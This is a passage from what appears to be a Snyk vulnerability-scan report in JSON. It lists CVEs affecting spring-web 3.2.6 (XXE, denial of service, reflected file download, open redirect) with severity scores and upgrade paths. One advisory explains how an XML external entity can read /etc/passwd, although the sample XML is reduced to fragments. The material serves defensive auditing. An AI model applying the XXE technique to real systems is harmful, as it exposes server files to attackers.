"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:48:48.781285Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:33.267561Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:48.781285Z" + } + ], + "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. This is due to not disabling the resolution of URI references by default in a DTD declaration. This occurs only when processing user provided XML documents.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nUpgrade `org.springframework:spring-web` to version 3.2.9.RELEASE, 4.0.5.RELEASE or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/8e096aeef55287dc829484996c9330cf755891a1)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/c6503ebbf7c9e21ff022c58706dbac5417b2b5eb)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/16390)\n- [Pivotal Security](http://www.gopivotal.com/security/cve-2014-0225)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-0225)\n", + "epssDetails": { + "percentile": "0.55630", + "probability": "0.00181", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2014-0225" + ], + "CWE": [ + "CWE-611" + ] + }, + "packageName": "org.springframework:spring-web", + "proprietary": false, + "creationTime": "2016-12-25T16:51:52Z", + "functions_new": [ + { + "version": [ + "[3,3.2.8.RELEASE]", + "[4,4.0.4.RELEASE]" + ], + "functionId": { + "className": "org.springframework.http.converter.xml.SourceHttpMessageConverter", + "functionName": "readDOMSource" + } + }, + { + "version": [ + "[3,3.2.8.RELEASE]", + "[4,4.0.4.RELEASE]" + ], + "functionId": { + "className": "org.springframework.http.converter.xml.SourceHttpMessageConverter", + "functionName": "readSAXSource" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2016-12-25T16:51:52Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-web" + }, + "publicationTime": "2016-12-25T16:51:52Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:48.781285Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@3.2.9.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-web", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-30164", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "credit": [ + "Toshiaki Maki" + ], + "semver": { + "vulnerable": [ + "[3.2.0.RELEASE, 3.2.14.RELEASE)", + "[4.0.0.RELEASE, 4.1.7.RELEASE)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "3.2.14.RELEASE", + "4.1.7.RELEASE" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-web", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/5a711c05ec750f069235597173084c2ee796242", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/17727", + "title": "GitHub Issue" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3192", + "title": "NVD" + }, + { + "url": "http://pivotal.io/security/cve-2015-3192", + "title": "Pivotal Security" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.5, + "modificationTime": "2024-03-11T09:46:06.799603Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:18.827537Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:06.799603Z" + } + ], + "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). It does not properly process inline DTD declarations when DTD is not entirely disabled, which allows remote attackers to cause a denial of service (memory consumption and out-of-memory errors) via a crafted XML file.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-web` to version 3.2.14.RELEASE, 4.1.7.RELEASE or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/5a711c05ec750f069235597173084c2ee796242)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/17727)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3192)\n- [Pivotal Security](http://pivotal.io/security/cve-2015-3192)\n", + "epssDetails": { + "percentile": "0.91000", + "probability": "0.03030", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-3192" + ], + "CWE": [ + "CWE-119" + ] + }, + "packageName": "org.springframework:spring-web", + "proprietary": false, + "creationTime": "2016-12-25T16:51:55Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-10-16T05:57:41Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-web" + }, + "publicationTime": "2016-12-25T16:51:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:06.799603Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@3.2.14.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-web", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-30165", + "title": "Reflected File Download", + "CVSSv3": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", + "credit": [ + "Alvaro Muñoz" + ], + "semver": { + "vulnerable": [ + "[3.2.0.RELEASE, 3.2.15.RELEASE)", + "[4.0.0.RELEASE, 4.1.8.RELEASE)", + "[4.2.0.RELEASE, 4.2.2.RELEASE)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "3.2.15.RELEASE", + "4.1.8.RELEASE", + "4.2.2.RELEASE" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.6, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-web", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/03f547eb9868f48f44d59b56067d4ac4740672c3", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/2bd1daa75ee0b8ec33608ca6ab065ef3e1815543", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/a95c3d820dbc4c3ae752f1b3ee22ee860b162402", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/18124", + "title": "GitHub Issue" + }, + { + "url": "https://www.trustwave.com/Resources/SpiderLabs-Blog/Reflected-File-Download---A-New-Web-Attack-Vector/", + "title": "Oren Hafif Blog" + }, + { + "url": "http://pivotal.io/security/cve-2015-5211", + "title": "Pivotal Security" + }, + { + "url": "https://access.redhat.com/security/cve/cve-2015-5211", + "title": "RedHat CVE Database" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", + "cvssV3BaseScore": 9.6, + "modificationTime": "2024-03-11T09:48:48.763614Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:03.857756Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:48.763614Z" + } + ], + "description": "## Overview\n\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\n\nAffected versions of this package are vulnerable to Reflected File Download\nvia a crafted URL with a batch script extension, resulting in the response being downloaded rather than rendered.\n\n## Remediation\n\nUpgrade `org.springframework:spring-web` to version 3.2.15.RELEASE, 4.1.8.RELEASE, 4.2.2.RELEASE or higher.\n\n\n## References\n\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/03f547eb9868f48f44d59b56067d4ac4740672c3)\n\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/2bd1daa75ee0b8ec33608ca6ab065ef3e1815543)\n\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/a95c3d820dbc4c3ae752f1b3ee22ee860b162402)\n\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/18124)\n\n- [Oren Hafif Blog](https://www.trustwave.com/Resources/SpiderLabs-Blog/Reflected-File-Download---A-New-Web-Attack-Vector/)\n\n- [Pivotal Security](http://pivotal.io/security/cve-2015-5211)\n\n- [RedHat CVE Database](https://access.redhat.com/security/cve/cve-2015-5211)\n", + "epssDetails": { + "percentile": "0.68512", + "probability": "0.00278", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-5211" + ], + "CWE": [ + "CWE-494" + ] + }, + "packageName": "org.springframework:spring-web", + "proprietary": false, + "creationTime": "2016-12-25T16:51:56Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-10-15T16:51:56Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-web" + }, + "publicationTime": "2016-12-25T16:51:56Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:48.763614Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@3.2.15.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-web", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-31331", + "title": "Cross-site Request Forgery (CSRF)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", + "credit": [ + "Spase Markovski" + ], + "semver": { + "vulnerable": [ + "[3.0.0.RELEASE,3.2.8.RELEASE)", + "[4.0.0.RELEASE,4.0.2.RELEASE)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "3.2.8.RELEASE", + "4.0.2.RELEASE" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-web", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/edba32b3093703d5e9ed42b5b8ec23ecc1998398%23diff-1f3f1d5cdab9ac92d1ca5ec7def8f131", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/fb0683c066e74e9667d6cd8c5fa01f674c68c3be%23diff-1f3f1d5cdab9ac92d1ca5ec7def8f131", + "title": "GitHub Commit" + }, + { + "url": "https://jira.spring.io/browse/SPR-11376", + "title": "Jira Issue" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0054", + "title": "NVD" + }, + { + "url": "http://www.pivotal.io/security/cve-2014-0054", + "title": "Pivotal Security" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 6.3, + "modificationTime": "2024-03-11T09:45:48.737689Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:09.210753Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:45:48.737689Z" + } + ], + "description": "## Overview\r\n[`org.springframework:spring-web`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-web%22)\r\nAffected versions of this package do not disable external entity resolution, which allows remote attackers to read arbitrary files, cause a denial of service and conduct CSRF attacks via crafted XML, aka an XML External Entity (XXE) issue. \r\n\r\n**NOTE:** this vulnerability exists because of an incomplete fix for [CVE-2013-4152](https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-31330), [CVE-2013-7315](https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-30162), and [CVE-2013-6429](https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-30160).\r\n\r\n## References\r\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0054)", + "epssDetails": { + "percentile": "0.96745", + "probability": "0.25530", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2014-0054" + ], + "CWE": [ + "CWE-352" + ] + }, + "packageName": "org.springframework:spring-web", + "proprietary": false, + "creationTime": "2017-02-22T07:28:31.538000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2014-04-17T14:55:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-web" + }, + "publicationTime": "2014-06-06T21:43:43Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:45:48.737689Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@3.2.8.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-web", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586", + "title": "Open Redirect", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", + "credit": [ + "Sean Pesce" + ], + "semver": { + "vulnerable": [ + "[,5.3.32)", + "[6.0.0,6.0.17)", + "[6.1.0,6.1.4)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.3.32", + "6.0.17", + "6.1.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-web", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/120ea0a51c63171e624ca55dbd7cae627d53a042", + "title": "GitHub Commit" + }, + { + "url": "https://spring.io/security/cve-2024-22243", + "title": "Spring Advisory" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.1, + "cvssVersion": "3.1", + "modificationTime": "2024-07-02T15:25:03.264548Z" + } + ], + "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Open Redirect when `UriComponentsBuilder` parses an externally provided URL, and the application subsequently uses that URL. If it contains hierarchical components such as path, query, and fragment it may evade validation.\n## Remediation\nUpgrade `org.springframework:spring-web` to version 5.3.32, 6.0.17, 6.1.4 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/120ea0a51c63171e624ca55dbd7cae627d53a042)\n- [Spring Advisory](https://spring.io/security/cve-2024-22243)\n", + "epssDetails": { + "percentile": "0.09306", + "probability": "0.00043", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2024-22243" + ], + "CWE": [ + "CWE-601", + "CWE-918" + ] + }, + "packageName": "org.springframework:spring-web", + "proprietary": false, + "creationTime": "2024-02-22T09:39:25.202849Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2024-02-21T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-web" + }, + "publicationTime": "2024-02-22T15:48:30.525565Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-07-02T15:25:03.264548Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.3.32" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-web", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6444790", + "title": "Open Redirect", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", + "credit": [ + "threedr3am" + ], + "semver": { + "vulnerable": [ + "[,5.3.33)", + "[6.0.0, 6.0.18)", + "[6.1.0, 6.1.5)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.3.33", + "6.0.18", + "6.1.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-web", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/1d2b55e670bcdaa19086f6af9a5cec31dd0390f0", + "title": "GitHub Commit" + }, + { + "url": "https://spring.io/security/cve-2024-22259", + "title": "Spring Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-17T13:32:42.716493Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.1, + "cvssVersion": "3.1", + "modificationTime": "2024-07-02T15:25:03.250566Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-17T13:32:42.716493Z" + } + ], + "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Open Redirect when using `UriComponentsBuilder` to parse an externally provided `URL` and perform validation checks on the host of the parsed URL. \r\n\r\n**Note:**\r\nThis is the same as [CVE-2024-22243](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586), but with different input.\n## Remediation\nUpgrade `org.springframework:spring-web` to version 5.3.33, 6.0.18, 6.1.5 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/1d2b55e670bcdaa19086f6af9a5cec31dd0390f0)\n- [Spring Advisory](https://spring.io/security/cve-2024-22259)\n", + "epssDetails": { + "percentile": "0.26310", + "probability": "0.00061", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2024-22259" + ], + "CWE": [ + "CWE-601" + ] + }, + "packageName": "org.springframework:spring-web", + "proprietary": false, + "creationTime": "2024-03-15T10:11:04.950943Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2024-03-14T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-web" + }, + "publicationTime": "2024-03-15T10:42:12.997061Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-07-02T15:25:03.250566Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.3.33" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-web", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6597980", + "title": "Open Redirect", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", + "credit": [ + "L0ne1y" + ], + "semver": { + "vulnerable": [ + "[,5.3.34)", + "[6.0.0, 6.0.19)", + "[6.1.0, 6.1.6)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.3.34", + "6.0.19", + "6.1.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.4, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-web", + "references": [ + { + "url": "https://spring.io/security/cve-2024-22262", + "title": "Spring Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-04-16T13:32:25.163950Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.4, + "cvssVersion": "3.1", + "modificationTime": "2024-04-12T08:32:41.960388Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-04-16T13:32:25.163950Z" + } + ], + "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Open Redirect when `UriComponentsBuilder` is used to parse an externally provided URL and perform validation checks on the host of the parsed URL. \n\n**Note:**\nThis is the same as [CVE-2024-22259](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6444790) and [CVE-2024-22243](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586), but with different input.\n## Remediation\nUpgrade `org.springframework:spring-web` to version 5.3.34, 6.0.19, 6.1.6 or higher.\n## References\n- [Spring Advisory](https://spring.io/security/cve-2024-22262)\n", + "epssDetails": { + "percentile": "0.09306", + "probability": "0.00043", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2024-22262" + ], + "CWE": [ + "CWE-601" + ] + }, + "packageName": "org.springframework:spring-web", + "proprietary": false, + "creationTime": "2024-04-12T08:32:41.735891Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2024-04-11T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-web" + }, + "publicationTime": "2024-04-12T08:32:41.913608Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-04-16T13:32:25.163950Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.3.34" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-web", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2329097", + "title": "Improper Output Neutralization for Logs", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "Dennis Kennedy" + ], + "semver": { + "vulnerable": [ + "[5.3.0,5.3.12)", + "[,5.2.18)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.3.12", + "5.2.18" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 4.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-core", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5", + "title": "Github Commit" + }, + { + "url": "https://pivotal.io/security/cve-2021-22096", + "title": "Pivotal Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": 